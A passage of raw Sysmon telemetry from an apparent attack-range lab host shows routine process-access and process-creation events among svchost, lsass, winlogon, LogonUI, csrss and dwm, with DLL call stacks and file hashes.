NEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291865Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.292{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291864Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.276{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291863Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.276{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291862Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.276{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291861Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.276{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291860Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.276{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291859Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.276{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291858Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.276{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291857Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.276{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291856Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.276{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291855Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.276{BEA10069-0289-6088-042A-00000000BB01}64044680C:\Windows\system32\csrss.exe{BEA10069-028A-6088-072A-00000000BB01}1504C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291854Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.276{BEA10069-0289-6088-052A-00000000BB01}63403760C:\Windows\system32\winlogon.exe{BEA10069-028A-6088-072A-00000000BB01}1504C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291853Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.280{BEA10069-028A-6088-072A-00000000BB01}1504C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-3{BEA10069-028A-6088-5D4E-8B0100000000}0x18b4e5d3SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000291852Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.276{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1b160|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291851Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.276{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291850Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.276{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291849Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.260{BEA10069-028A-6088-062A-00000000BB01}44442992C:\Windows\system32\LogonUI.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291848Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.258{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291847Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.257{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291846Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.238{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291845Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.238{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291844Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.238{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291843Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.238{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291842Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.238{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291841Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.238{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291840Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.238{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291839Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 